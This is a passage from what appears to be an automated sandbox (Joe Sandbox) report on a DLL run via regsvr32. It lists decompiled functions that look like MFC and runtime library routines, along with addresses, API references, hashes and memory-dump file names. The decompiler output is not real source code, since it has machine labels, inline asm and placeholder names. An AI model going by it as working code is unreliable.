							} else {
								L18:
								_push(_t44);
								goto L19;
							}
							goto L20;
						} else {
							if((_v8 & 0x00000020) != 0) {
								if(_t23 == 0) {
									L21:
									_push(1);
									_push(_t44);
									goto L25;
								} else {
									_t49 = E10015FD5(_t33, E100160FC(_t33));
									if(_t49 == 0 || _t49 == _t44 || (E10016079(_t49) & 0x00000010) == 0) {
										goto L21;
									} else {
										_push(_t49);
										L19:
										_push(_t33);
										E1001609A(_t33);
										L20:
										if((_v8 & 0x00000030) == 0) {
											_t48 = E10015FD5(_t33, E100160FC(_t33));
											_t23 = E10016079(_t48);
											if((_t23 & 0x00000020) != 0) {
												_t23 = E100454E0(_t48);
												if(_t23 != 0) {
													_push(1);
													_push(_t48);
													L25:
													_t23 = E1001602C();
												}
											}
										} else {
											goto L21;
										}
									}
								}
							}
						}
					} else {
						_t23 = GetWindowLongA( *(_t44 + 0x1c), 0xffffffec);
						if((_t23 & 0x00010000) == 0) {
							_v8 = E10016079(_t44);
							goto L7;
						}
					}
				}
				return _t23;
			}

0x1001612c
0x1001612d
0x10016134
0x10016139
0x1001613f
0x1001613b
0x1001613b
0x1001613b
0x10016142
0x10016149
0x10016151
0x10016159
0x1001617b
0x1001617b
0x10016180
0x100161b7
0x100161c6
0x00000000
0x00000000
0x100161ce
0x100161ce
0x100161ce
0x00000000
0x100161ce
0x00000000
0x10016182
0x10016186
0x1001618e
0x100161db
0x100161db
0x100161dd
0x00000000
0x10016190
0x1001619d
0x100161a1
0x00000000
0x100161b2
0x100161b2
0x100161cf
0x100161cf
0x100161d0
0x100161d5
0x100161d9
0x100161ed
0x100161f0
0x100161f8
0x100161fc
0x10016203
0x10016205
0x10016207
0x10016208
0x10016208
0x1001620e
0x10016203
0x00000000
0x00000000
0x00000000
0x100161d9
0x100161a1
0x1001618e
0x10016186
0x1001615b
0x10016160
0x1001616b
0x10016178
0x00000000
0x10016178
0x1001616b
0x10016159
0x10016213

APIs

IsChild.USER32 ref: 10016149
GetWindowLongA.USER32(?,000000EC), ref: 10016160

Strings

0, xrefs: 100161D5

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: ChildLongWindow
String ID: 0
API String ID: 1178903432-4108050209
Opcode ID: d93c127f247e3e21d7aed034e68c59db2483ab7db22cb845cf6477615ac557ca
Instruction ID: c23708d64d92c352203c60b47c5dc0d22921c31e369a2609fe539fd7fb8da39c
Opcode Fuzzy Hash: d93c127f247e3e21d7aed034e68c59db2483ab7db22cb845cf6477615ac557ca
Instruction Fuzzy Hash: 4F21CF75141615BAEB12DA688D46FAF76ECEF4C6E4F250018FC41AE083EB35EDC08260

Uniqueness

Uniqueness Score: -1.00%

Function 10042CF2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E10042CF2(void* __ecx, int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				struct _WNDCLASSA _v44;
				void* __ebp;
				void* _t27;
				intOrPtr _t40;
				struct HINSTANCE__* _t46;
				CHAR* _t50;

				E10064D48(1);
				E1001AC67(0, 0);
				_push(0);
				_t50 = E100648FB() + 0x58;
				_t27 = E10064B8B();
				_t40 = _a8;
				_t46 =  *(_t27 + 8);
				if(_t40 != 0 || _a12 != _t40 || _a16 != _t40) {
					wsprintfA(_t50, "Afx:%x:%x:%x:%x:%x", _t46, _a4, _t40, _a12, _a16);
				} else {
					wsprintfA(_t50, "Afx:%x:%x", _t46, _a4);
				}
				if(GetClassInfoA(_t46, _t50,  &_v44) == 0) {
					_v44.style = _a4;
					_v44.lpfnWndProc = DefWindowProcA;
					_v44.cbWndExtra = 0;
					_v44.cbClsExtra = 0;
					_v44.lpszMenuName = 0;
					_v44.hIcon = _a16;
					_t44 = _a12;
					_push( &_v44);
					_v44.hInstance = _t46;
					_v44.hCursor = _t40;
					_v44.hbrBackground = _a12;
					_v44.lpszClassName = _t50;
					if(E10042C61() == 0) {
						L1004FB42(_t44);
					}
				}
				return _t50;
			}

0x10042cf4
0x10042cfd
0x10042d08
0x10042d12
0x10042d15
0x10042d1a
0x10042d1d
0x10042d22
0x10042d54
0x10042d2e
0x10042d38
0x10042d3e
0x10042d6b
0x10042d73
0x10042d7b
0x10042d80
0x10042d83
0x10042d86
0x10042d89
0x10042d8c
0x10042d92
0x10042d93
0x10042d96
0x10042d99
0x10042d9c
0x10042da6
0x10042da8
0x10042da8
0x10042da6
0x10042db3

APIs

Part of subcall function 10064D48: LeaveCriticalSection.KERNEL32(?,100656DB,00000010,00000010,?,?,00000100,?,?,10064BB0,10064BFD,10062AFA,10064BB6,10041F16,?,10041F81), ref: 10064D60

Part of subcall function 1001AC67: RaiseException.KERNEL32(00000001,?,00000000,?,00000000,00000000,00000001,?,?,1000EE0F,00000000,?,?), ref: 1001AC95

wsprintfA.USER32 ref: 10042D38
wsprintfA.USER32 ref: 10042D54
GetClassInfoA.USER32(?,-00000058,?), ref: 10042D63

Strings

Afx:%x:%x, xrefs: 10042D32

Memory Dump Source

Source File: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: wsprintf$ClassCriticalExceptionInfoLeaveRaiseSection
String ID: Afx:%x:%x
API String ID: 2529146597-2071556601
Opcode ID: 428fff5bc6f8eb280109baab51ad875ee4b76d00f38afb18c7eba1179d62d125
Instruction ID: 032df9dbf81279c956c106b039238c45908dc978c387c2edae55548db33a1851
Opcode Fuzzy Hash: 428fff5bc6f8eb280109baab51ad875ee4b76d00f38afb18c7eba1179d62d125
Instruction Fuzzy Hash: E2114274E0021A9FDB40DFA9C8C19DEBBF9EF49254F11403AF909E7201E7709A41CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 100289A1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E100289A1(void* _a4, signed int _a8, signed char _a9) {
				long _t19;
				signed int _t28;
				signed char _t31;
				signed int _t37;

				_t31 = 0;
				if((_a8 & 0x00000008) != 0) {
					_t31 = 0x20;
				}
				if((_a9 & 0x00000040) != 0) {
					_t31 = _t31 | 0x00000080;
				}
				if((_a8 & 0x00000080) != 0) {
					_t31 = _t31 | 0x00000010;
				}
				_t19 = GetFileType(_a4);
				if(_t19 != 0) {
					if(_t19 != 2) {
						if(_t19 == 3) {
							_t31 = _t31 | 0x00000008;
						}
					} else {
						_t31 = _t31 | 0x00000040;
					}
					_t37 = E10028741();
					if(_t37 != 0xffffffff) {
						E10028864(_t37, _a4);
						 *( *((intOrPtr*)(0x10095300 + (_t37 >> 5) * 4)) + 4 + ((_t37 & 0x0000001f) + (_t37 & 0x0000001f) * 8) * 4) = _t31 | 0x00000001;
						E10028AA7(_t37);
						return _t37;
					} else {
						 *((intOrPtr*)(E1001CB81())) = 0x18;
						_t28 = E1001CB8A();
						 *_t28 =  *_t28 & 0x00000000;
						goto L14;
					}
				} else {
					_t28 = E1001CB0E(GetLastError());
					L14:
					return _t28 | 0xffffffff;
				}
			}

0x100289a5
0x100289ac
0x100289ae
0x100289ae
0x100289b5
0x100289b7
0x100289b7
0x100289be
0x100289c0
0x100289c0
0x100289c6
0x100289ce
0x100289e2
0x100289ec
0x100289ee
0x100289ee
0x100289e4
0x100289e4
0x100289e4
0x100289f6
0x100289fb
0x10028a19
0x10028a36
0x10028a3a
0x00000000
0x100289fd
0x10028a02
0x10028a08
0x10028a0d
0x00000000
0x10028a0d
0x100289d0
0x100289d7
0x10028a10
0x00000000
0x10028a10

APIs

GetFileType.KERNEL32 ref: 100289C6
GetLastError.KERNEL32 ref: 100289D0

Strings

@, xrefs: 100289B1

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: ErrorFileLastType
String ID: @
API String ID: 1621975986-2766056989
Opcode ID: cb629ab443508b1a548687cbc9cfc7759cc80cad9b42f965291da84fe4cbba6d
Instruction ID: 65ba562b9e98367e9208e9054f2fc5d3d881f6682510b206c44b365be9f9df2d
Opcode Fuzzy Hash: cb629ab443508b1a548687cbc9cfc7759cc80cad9b42f965291da84fe4cbba6d
Instruction Fuzzy Hash: 431136395071585AEB10DA34EC467D83B88EB01364F8C8602FD688B1D2CB359B80AB56

Uniqueness

Uniqueness Score: -1.00%

Function 1002BE50 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23
stringCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E1002BE50(struct HWND__* _a20) {
				struct HWND__* _t3;
				int _t5;
				void* _t9;
				CHAR* _t10;

				_t10 = _t9 - 0x10;
				if( *0x10096d40 < 0x35f) {
					L3:
					return 1;
				} else {
					_t3 = _a20;
					if(_t3 == 0) {
						goto L3;
					} else {
						GetClassNameA(_t3, _t10, 0x10);
						_t5 = lstrcmpA(_t10, "ComboBox");
						asm("sbb eax, eax");
						return _t5 + 1;
					}
				}
			}

0x1002be50
0x1002be5c
0x1002be8e
0x1002be96
0x1002be5e
0x1002be5e
0x1002be64
0x00000000
0x1002be66
0x1002be6e
0x1002be7e
0x1002be87
0x1002be8d
0x1002be8d
0x1002be64

APIs

GetClassNameA.USER32(?,?,00000010), ref: 1002BE6E
lstrcmpA.KERNEL32(?,ComboBox,?,00000010), ref: 1002BE7E

Strings

ComboBox, xrefs: 1002BE78

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: ClassNamelstrcmp
String ID: ComboBox
API String ID: 3770760073-1152790111
Opcode ID: ef2a6e83dffb1799fd34f51c9685442015cf07e9bfbee6b296e953170028a8e9
Instruction ID: f16de84bcdb58d89e6ba0ac2ae8bf8fbfa47fe6e5f1080990083c5ea2c8c7b53
Opcode Fuzzy Hash: ef2a6e83dffb1799fd34f51c9685442015cf07e9bfbee6b296e953170028a8e9
Instruction Fuzzy Hash: ABE04F70A046015BFB14EB28CC8AAAA32E4F754301FC5094DF259C11A1FB76D5948752

Uniqueness

Uniqueness Score: -1.00%

Function 1002BEA0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23
stringCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E1002BEA0(struct HWND__* _a20) {
				struct HWND__* _t3;
				int _t5;
				void* _t9;
				CHAR* _t10;

				_t10 = _t9 - 0x10;
				if( *0x10096d40 < 0x35f) {
					L3:
					return 1;
				} else {
					_t3 = _a20;
					if(_t3 == 0) {
						goto L3;
					} else {
						GetClassNameA(_t3, _t10, 0x10);
						_t5 = lstrcmpA(_t10, "ComboBox");
						asm("sbb eax, eax");
						return _t5 + 1;
					}
				}
			}

0x1002bea0
0x1002beac
0x1002bede
0x1002bee6
0x1002beae
0x1002beae
0x1002beb4
0x00000000
0x1002beb6
0x1002bebe
0x1002bece
0x1002bed7
0x1002bedd
0x1002bedd
0x1002beb4

APIs

GetClassNameA.USER32(?,?,00000010), ref: 1002BEBE
lstrcmpA.KERNEL32(?,ComboBox,?,00000010), ref: 1002BECE

Strings

ComboBox, xrefs: 1002BEC8

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: ClassNamelstrcmp
String ID: ComboBox
API String ID: 3770760073-1152790111
Opcode ID: ef2a6e83dffb1799fd34f51c9685442015cf07e9bfbee6b296e953170028a8e9
Instruction ID: ffb32742fe0b4b231827c6d7de26411bc2802593543dd09c6fc36a784e8f24a2
Opcode Fuzzy Hash: ef2a6e83dffb1799fd34f51c9685442015cf07e9bfbee6b296e953170028a8e9
Instruction Fuzzy Hash: 89E04F70A046025BFF14EB28CC8AAAA32E8F754301FC5098DF25DC11A1FBB6D5958752

Uniqueness

Uniqueness Score: -1.00%

Function 10063634 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10063634(void* __ecx) {
				short _t5;
				void* _t8;

				_t8 = __ecx;
				 *((short*)(_t8 + 0xb0)) = GlobalAddAtomA( *(__ecx + 0x88));
				_t5 = GlobalAddAtomA("system");
				 *(_t8 + 0xb2) = _t5;
				return _t5;
			}

0x10063635
0x1006364b
0x10063652
0x10063654
0x1006365d

APIs

GlobalAddAtomA.KERNEL32(?), ref: 10063644
GlobalAddAtomA.KERNEL32(system), ref: 10063652

Strings

system, xrefs: 10063646

Memory Dump Source

Source File: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: AtomGlobal
String ID: system
API String ID: 2189174293-3377271179
Opcode ID: fb5e387bf32c1d7e94473299b10a97f17105ab968a15e4d98af11453492c2073
Instruction ID: 15ba265354aa29f5e637f828749cabcf963184c4f645feaa801eb5c6c0b3714e
Opcode Fuzzy Hash: fb5e387bf32c1d7e94473299b10a97f17105ab968a15e4d98af11453492c2073
Instruction Fuzzy Hash: 26D01236018750A6CA2077BDEC04BC7F3B9FFC5220F02441FD19983130DBA02845875A

Uniqueness

Uniqueness Score: -1.00%

Function 100368F7 Relevance: 5.1, APIs: 4, Instructions: 134
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E100368F7(CHAR** __ecx, CHAR* _a4, CHAR* _a8) {
				signed int _v8;
				signed int _v12;
				int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				CHAR** _v28;
				intOrPtr _v32;
				void* __ebx;
				void* __ebp;
				int _t57;
				void* _t60;
				intOrPtr _t63;
				intOrPtr _t70;
				void* _t84;
				CHAR* _t85;
				CHAR* _t86;
				CHAR** _t96;
				void* _t97;
				CHAR* _t99;
				intOrPtr _t103;
				void* _t107;
				void* _t108;
				void* _t109;

				_t96 = __ecx;
				_v28 = __ecx;
				if(_a4 == 0) {
					L2:
					return 0;
				}
				_t57 = lstrlenA(_a4);
				_v16 = _t57;
				if(_t57 != 0) {
					if(_a8 != 0) {
						_v8 = lstrlenA(_a8);
					} else {
						_v8 = 0;
					}
					_t99 =  *_t96;
					_v12 = 0;
					_t84 =  *((intOrPtr*)(_t99 - 8)) + _t99;
					if(_t99 >= _t84) {
						L21:
						return _v12;
					} else {
						while(1) {
							L7:
							_t60 = E1001BB25(_t99, _a4);
							if(_t60 == 0) {
								break;
							}
							_v12 = _v12 + 1;
							_t99 = _t60 + _v16;
						}
						_t99 =  &(_t99[lstrlenA(_t99) + 1]);
						if(_t99 < _t84) {
							goto L7;
						}
						if(_v12 <= 0) {
							goto L21;
						}
						E100458C7(_t84, _t96);
						_t85 =  *_t96;
						_t63 =  *((intOrPtr*)(_t85 - 8));
						_t103 = (_v8 - _v16) * _v12 + _t63;
						_v20 = _t63;
						_v32 = _t103;
						if( *((intOrPtr*)(_t85 - 4)) < _t103 ||  *((intOrPtr*)(_t85 - 0xc)) > 1) {
							_v24 = _t85 - 0xc;
							E1004578B(_t96, _t108, _t103);
							E1001ACB0(_t85,  *_t96, _t85,  *((intOrPtr*)(_v24 + 4)));
							_t109 = _t109 + 0xc;
							E10045886(_v24);
						}
						_t86 =  *_t96;
						_t70 =  *((intOrPtr*)(_t86 - 8)) + _t86;
						_v24 = _t70;
						if(_t86 >= _t70) {
							L20:
							 *((intOrPtr*)( *_t96 - 8)) = _t103;
							goto L21;
						} else {
							do {
								_t97 = E1001BB25(_t86, _a4);
								if(_t97 == 0) {
									goto L18;
								} else {
									goto L16;
								}
								do {
									L16:
									_t86 = _t97 + _v8;
									_t107 =  *_v28 - _t97 - _v16 + _v20;
									E1001B7F0(_t86, _v16 + _t97, _t107);
									E1001ACB0(_t86, _t97, _a8, _v8);
									 *(_t107 + _t86) =  *(_t107 + _t86) & 0x00000000;
									_v20 = _v20 + _v8 - _v16;
									_t97 = E1001BB25(_t86, _a4);
									_t109 = _t109 + 0x20;
								} while (_t97 != 0);
								_t103 = _v32;
								L18:
								_t86 =  &(_t86[lstrlenA(_t86) + 1]);
							} while (_t86 < _v24);
							_t96 = _v28;
							goto L20;
						}
					}
				}
				goto L2;
			}

0x10036905
0x10036907
0x1003690a
0x1003691e
0x00000000
0x1003691e
0x10036915
0x10036919
0x1003691c
0x10036928
0x10036934
0x1003692a
0x1003692a
0x1003692a
0x10036937
0x10036939
0x1003693f
0x10036943
0x10036a50
0x00000000
0x10036949
0x10036949
0x10036949
0x1003694d
0x10036956
0x00000000
0x00000000
0x1003695b
0x1003695e
0x1003695e
0x1003696a
0x10036970
0x00000000
0x00000000
0x10036976
0x00000000
0x00000000
0x1003697e
0x10036986
0x1003698b
0x10036992
0x10036994
0x1003699a
0x1003699d
0x100369ab
0x100369ae
0x100369bc
0x100369c1
0x100369c7
0x100369c7
0x100369cc
0x100369d1
0x100369d5
0x100369d8
0x10036a4b
0x10036a4d
0x00000000
0x100369da
0x100369da
0x100369e3
0x100369e9
0x00000000
0x00000000
0x00000000
0x00000000
0x100369eb
0x100369eb
0x100369f8
0x100369ff
0x10036a05
0x10036a11
0x10036a1f
0x10036a24
0x10036a2c
0x10036a2e
0x10036a31
0x10036a35
0x10036a38
0x10036a3f
0x10036a43
0x10036a48
0x00000000
0x10036a48
0x100369d8
0x10036943
0x00000000

APIs

lstrlenA.KERNEL32(?), ref: 10036915
lstrlenA.KERNEL32(?), ref: 10036932
lstrlenA.KERNEL32(755559EB), ref: 10036964
